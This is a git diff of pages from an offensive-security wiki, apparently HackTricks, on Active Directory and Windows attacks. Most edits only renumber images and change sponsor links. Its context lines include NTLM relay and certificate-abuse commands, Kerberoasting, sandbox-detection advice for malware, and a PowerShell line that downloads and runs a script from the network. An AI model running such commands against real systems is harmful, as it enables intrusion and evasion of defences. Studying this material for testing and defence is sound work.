-![](<../../.gitbook/assets/image (805).png>)
+![](<../../.gitbook/assets/image (808).png>)
 
 #### Find Trustable Links
 
@@ -164,7 +163,7 @@ select * from master..sysservers;
 EXEC sp_linkedservers;
 ```
 
-![](<../../.gitbook/assets/image (713).png>)
+![](<../../.gitbook/assets/image (716).png>)
 
 #### Execute queries in trustable link
 
@@ -178,7 +177,7 @@ select * from openquery("dcorp-sql1", 'select * from master..sysservers')
 Check where double and single quotes are used, it's important to use them that way.
 {% endhint %}
 
-![](<../../.gitbook/assets/image (640).png>)
+![](<../../.gitbook/assets/image (643).png>)
 
 You can continue these trusted links chain forever manually.
 
@@ -210,8 +209,7 @@ A strategy that many authors have come up with is to force a SYSTEM service to a
 
 [SweetPotato](https://github.com/CCob/SweetPotato) has a collection of these various techniques which can be executed via Beacon's `execute-assembly` command.
 
-
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index 114adbf11..33b89a57e 100644
--- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -170,7 +170,7 @@ Notable permissions applicable to certificate templates include:
 
 An example of a privesc like the previous one:
 
-<figure><img src="../../../.gitbook/assets/image (811).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (814).png" alt=""><figcaption></figcaption></figure>
 
 ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.
 
@@ -412,7 +412,7 @@ Another limitation of NTLM relay attacks is that **an attacker-controlled machin
 Certify.exe cas
 ```
 
-<figure><img src="../../../.gitbook/assets/image (69).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (72).png" alt=""><figcaption></figcaption></figure>
 
 The `msPKI-Enrollment-Servers` property is used by enterprise Certificate Authorities (CAs) to store Certificate Enrollment Service (CES) endpoints. These endpoints can be parsed and listed by utilizing the tool **Certutil.exe**:
 
@@ -420,14 +420,14 @@ The `msPKI-Enrollment-Servers` property is used by enterprise Certificate Author
 certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
 ```
 
-<figure><img src="../../../.gitbook/assets/image (754).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (757).png" alt=""><figcaption></figcaption></figure>
 
 ```powershell
 Import-Module PSPKI
 Get-CertificationAuthority | select Name,Enroll* | Format-List *
 ```
 
-<figure><img src="../../../.gitbook/assets/image (937).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (940).png" alt=""><figcaption></figcaption></figure>
 
 #### Abuse with Certify
 
@@ -638,9 +638,9 @@ Certificate Authorities
 
 ### Abuse Scenario
 
-It need to setup a relay server: 
+It need to setup a relay server:
 
-``` bash
+```bash
 $ certipy relay -target 'rpc://DC01.domain.local' -ca 'DC01-CA' -dc-ip 192.168.100.100
 Certipy v4.7.0 - by Oliver Lyak (ly4k)
 
@@ -663,7 +663,7 @@ Note: For domain controllers, we must specify `-template` in DomainController.
 
 Or using [sploutchy's fork of impacket](https://github.com/sploutchy/impacket) :
 
-``` bash
+```bash
 $ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -smb2support
 ```
 
@@ -673,7 +673,7 @@ $ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -s
 
 Administrators can set up the Certificate Authority to store it on an external device like the "Yubico YubiHSM2".
 
-If USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine, an authentication key (sometimes referred to as a "password") is required for the Key Storage Provider to generate and utilize keys in the YubiHSM. 
+If USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine, an authentication key (sometimes referred to as a "password") is required for the Key Storage Provider to generate and utilize keys in the YubiHSM.
 
 This key/password is stored in the registry under `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword` in cleartext.
 
@@ -683,7 +683,7 @@ Reference in [here](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-
 
 If the CA's private key stored on a physical USB device when you got a shell access, it is possible to recover the key.
 
-In first, you need to obtain the CA certificate (this is public) and then:  
+In first, you need to obtain the CA certificate (this is public) and then:
 
 ```cmd
 # import it to the user store with CA certificate
@@ -695,14 +695,13 @@ $ certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA Common
 
 Finally, use the certutil `-sign` command to forge a new arbitrary certificate using the CA certificate and its private key.
 
-
 ## OID Group Link Abuse - ESC13
 
 ### Explanation
 
 The `msPKI-Certificate-Policy` attribute allows the issuance policy to be added to the certificate template. The `msPKI-Enterprise-Oid` objects that are responsible for issuing policies can be discovered in the Configuration Naming Context (CN=OID,CN=Public Key Services,CN=Services) of the PKI OID container. A policy can be linked to an AD group using this object's `msDS-OIDToGroupLink` attribute, enabling a system to authorize a user who presents the certificate as though he were a member of the group. [Reference in here](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53).
 
-In other words, when a user has permission to enroll a certificate and the certificate is link to an OID group, the user can inherit the privileges of this group. 
+In other words, when a user has permission to enroll a certificate and the certificate is link to an OID group, the user can inherit the privileges of this group.
 
 Use [Check-ADCSESC13.ps1](https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1) to find OIDToGroupLink:
 
@@ -732,7 +731,7 @@ OID msDS-OIDToGroupLink: CN=VulnerableGroup,CN=Users,DC=domain,DC=local
 
 Find a user permission it can use `certipy find` or `Certify.exe find /showAllPermissions`.
 
-If `John` have have permission to enroll `VulnerableTemplate`,  the user can inherit the privileges of `VulnerableGroup` group. 
+If `John` have have permission to enroll `VulnerableTemplate`, the user can inherit the privileges of `VulnerableGroup` group.
 
 All it need to do just specify the template, it will get a certificate with OIDToGroupLink rights.
 
@@ -740,7 +739,6 @@ All it need to do just specify the template, it will get a certificate with OIDT
 certipy req -u "John@domain.local" -p "password" -dc-ip 192.168.100.100 -target "DC01.domain.local" -ca 'DC01-CA' -template 'VulnerableTemplate'
 ```
 
-
 ## Compromising Forests with Certificates Explained in Passive Voice
 
 ### Breaking of Forest Trusts by Compromised CAs
@@ -754,7 +752,7 @@ Upon authentication across a trust, the **Authenticated Users SID** is added to
 
 Both scenarios lead to an **increase in the attack surface** from one forest to another. The settings of the certificate template could be exploited by an attacker to obtain additional privileges in a foreign domain.
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md
index 43569cb51..3ca1e62f4 100644
--- a/windows-hardening/active-directory-methodology/asreproast.md
+++ b/windows-hardening/active-directory-methodology/asreproast.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -120,7 +120,7 @@ ASRepCatcher listen
 
 ***
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/windows-hardening/active-directory-methodology/dcsync.md b/windows-hardening/active-directory-methodology/dcsync.md
index 22078efb6..927c1e56b 100644
--- a/windows-hardening/active-directory-methodology/dcsync.md
+++ b/windows-hardening/active-directory-methodology/dcsync.md
@@ -1,12 +1,12 @@
 # DCSync
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}
 
 <details>
 
@@ -105,10 +105,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}
diff --git a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index 5bf7d3955..bbddda830 100644
--- a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -80,13 +80,13 @@ In the previous flow it was used the trust hash instead of the **clear text pass
 
 The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
 
-![](<../../.gitbook/assets/image (935).png>)
+![](<../../.gitbook/assets/image (938).png>)
 
 Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
 
 The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
 
-![](<../../.gitbook/assets/image (789).png>)
+![](<../../.gitbook/assets/image (792).png>)
 
 ## References
 
diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md
index 65a17f49b..cdd8026c8 100644
--- a/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/windows-hardening/active-directory-methodology/kerberoast.md
@@ -1,12 +1,12 @@
 # Kerberoast
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
 
 <details>
 
@@ -117,13 +117,13 @@ Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASC
 When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
 {% endhint %}
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
 
 ### Cracking
 
@@ -215,10 +215,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=kerberoast) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=kerberoast" %}
diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 1b6d96219..fbefa4012 100644
--- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -115,7 +115,7 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
 * [https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting](https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting)
 * [https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/](https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/windows-hardening/active-directory-methodology/laps.md b/windows-hardening/active-directory-methodology/laps.md
index e1c532be6..0021d36a4 100644
--- a/windows-hardening/active-directory-methodology/laps.md
+++ b/windows-hardening/active-directory-methodology/laps.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -139,7 +139,7 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T
 ## References
 * [https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/](https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index 76e88832c..2869301ed 100644
--- a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -54,7 +54,7 @@ To conform to operational security and use AES256, the following command can be
 
 * [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/windows-hardening/active-directory-methodology/pass-the-ticket.md b/windows-hardening/active-directory-methodology/pass-the-ticket.md
index 1bea8a033..05c564f5b 100644
--- a/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
 
 ## Pass The Ticket (PTT)
 
@@ -68,13 +68,13 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
 
 * [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=pass-the-ticket) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
 
 <details>
 
diff --git a/windows-hardening/active-directory-methodology/password-spraying.md b/windows-hardening/active-directory-methodology/password-spraying.md
index 4f21f01c9..0614e6309 100644
--- a/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/windows-hardening/active-directory-methodology/password-spraying.md
@@ -79,7 +79,7 @@ python kerbrute.py -domain jurassic.park -users users.txt -password Password123
 
 * With the `scanner/smb/smb_login` module of **Metasploit**:
 
-![](<../../.gitbook/assets/image (742).png>)
+![](<../../.gitbook/assets/image (745).png>)
 
 * Using **rpcclient**:
 
diff --git a/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
index 18ccdef42..c9c219deb 100644
--- a/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -148,7 +148,7 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
 * [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object)
 * [https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/windows-hardening/authentication-credentials-uac-and-efs/README.md b/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 9858f8314..0e69439fb 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
@@ -283,7 +283,7 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
 [uac-user-account-control.md](uac-user-account-control.md)
 {% endcontent-ref %}
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index aa7b2b113..e3c0cdc8a 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
@@ -193,7 +193,7 @@ Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history)
 
 You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
 
-![](<../../.gitbook/assets/image (860).png>)
+![](<../../.gitbook/assets/image (863).png>)
 
 (_explorer.exe_ should works)
 
@@ -222,7 +222,7 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
 
 Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
diff --git a/windows-hardening/av-bypass.md b/windows-hardening/av-bypass.md
index fcdcfd492..3a9ac87f7 100644
--- a/windows-hardening/av-bypass.md
+++ b/windows-hardening/av-bypass.md
@@ -52,11 +52,11 @@ Dynamic analysis is when the AV runs your binary in a sandbox and watches for ma
 
 It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you can check for the computer name in your malware before detonation, if the name matches HAL9TH, it means you're inside defender's sandbox, so you can make your program exit.
 
-<figure><img src="../.gitbook/assets/image (206).png" alt=""><figcaption><p>source: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (209).png" alt=""><figcaption><p>source: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
 
 Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
 
-<figure><img src="../.gitbook/assets/image (245).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (248).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
 
 As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
 
@@ -74,7 +74,7 @@ Whenever it's possible, always **prioritize using DLLs for evasion**, in my expe
 
 As we can see in this image, a DLL Payload from Havoc has a detection rate of 4/26 in antiscan.me, while the EXE payload has a 7/26 detection rate.
 
-<figure><img src="../.gitbook/assets/image (1127).png" alt=""><figcaption><p>antiscan.me comparison of a normal Havoc EXE payload vs a normal Havoc DLL</p></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1130).png" alt=""><figcaption><p>antiscan.me comparison of a normal Havoc EXE payload vs a normal Havoc DLL</p></figcaption></figure>
 
 Now we'll show some tricks you can use with DLL files to be much more stealthier.
 
@@ -130,7 +130,7 @@ These are the results:
 
 Both our shellcode (encoded with [SGN](https://github.com/EgeBalci/sgn)) and the proxy DLL have a 0/26 Detection rate in [antiscan.me](https://antiscan.me)! I would call that a success.
 
-<figure><img src="../.gitbook/assets/image (190).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (193).png" alt=""><figcaption></figcaption></figure>
 
 {% hint style="info" %}
 I **highly recommend** you watch [S3cur3Th1sSh1t's twitch VOD](https://www.twitch.tv/videos/1644171543) about DLL Sideloading and also [ippsec's video](https://www.youtube.com/watch?v=3eROsG\_WNpE) to learn more about what we've discussed more in-depth.
@@ -171,7 +171,7 @@ It allows antivirus solutions to inspect script behavior by exposing script cont
 
 Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` will produce the following alert on Windows Defender.
 
-<figure><img src="../.gitbook/assets/image (1132).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1135).png" alt=""><figcaption></figcaption></figure>
 
 Notice how it prepends `amsi:` and then the path to the executable from which the script ran, in this case, powershell.exe
 
@@ -251,13 +251,13 @@ You may have seen this screen when downloading some executables from the interne
 
 Microsoft Defender SmartScreen is a security mechanism intended to protect the end user against running potentially malicious applications.
 
-<figure><img src="../.gitbook/assets/image (661).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (664).png" alt=""><figcaption></figcaption></figure>
 
 SmartScreen mainly works with a reputation-based approach, meaning that uncommonly download applications will trigger SmartScreen thus alerting and preventing the end user from executing the file (although the file can still be executed by clicking More Info -> Run anyway).
 
